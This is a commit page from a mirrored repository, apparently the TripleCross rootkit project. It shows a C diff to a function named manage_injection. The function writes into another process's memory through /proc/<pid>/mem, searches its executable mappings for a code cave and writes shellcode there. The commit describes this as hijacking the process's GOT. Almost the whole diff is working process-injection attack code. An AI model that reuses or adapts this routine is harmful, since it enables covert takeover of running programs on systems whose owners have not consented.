admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-26 03:13:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Introduced shellcode and finished code cave writing and injection. RELRO working

Browse Source
This commit is contained in:
h3xduck
2022-04-07 11:54:24 -04:00
parent 3455b80010
commit be5605db5f
9 changed files with 3241 additions and 3124 deletions
Download Patch File Download Diff File Expand all files Collapse all files

25
src/user/include/utils/mem/injection.h
View File

@@ -14,7 +14,7 @@
int manage_injection(const struct rb_event* event){
char mem_file_name[100];
__u64 buf = (__u64)CODE_CAVE_ADDRESS;
__u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
int mem_fd;
@@ -24,18 +24,18 @@ int manage_injection(const struct rb_event* event){
sprintf(mem_file_name, "/proc/%d/mem", event->pid);
mem_fd = open(mem_file_name, O_RDWR);
lseek(mem_fd, event->got_address, SEEK_SET);
//lseek(mem_fd, event->got_address, SEEK_SET);
for(int ii=0; ii<sizeof(__u64); ii++){
/*for(int ii=0; ii<sizeof(__u64); ii++){
if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
perror("Error while writing at GOT");
return -1;
}
}
}*/
//Parsing /proc/pid/maps.
//Note that addresses usually appear as 32-bit when catting, but this is not completely true
//
//Note that addresses usually appear as 32-bit when catting, but this is not completely true, 0s are ommitted
//Considering them as 64-bit
char *maps_file = calloc(512, sizeof(char));
FILE *f;
sprintf(maps_file, "/proc/%d/maps", event->pid);
@@ -44,17 +44,26 @@ int manage_injection(const struct rb_event* event){
__u32 pgoff, major, minor;
__u64 from, to, ino;
char flags[4];
int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
printf("MAPS: %s\n", maps_file);
//Parse flags, find executable one
if(flags[2] == 'x'){
//Candidate for code cave finding
__u64 cave_addr = code_cave_find_address(mem_fd, from, to, flags, pgoff, major, minor, ino);
if(cave_addr!=0){
//Found valid cave.
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address)<0){
printf("Continuing with next cave candidate. Some writes might have been performed already\n");
}
printf("Successfully hijacked GOT\n");
break;
}
}
}
free(maps_file);
close(mem_fd);
return 0;
}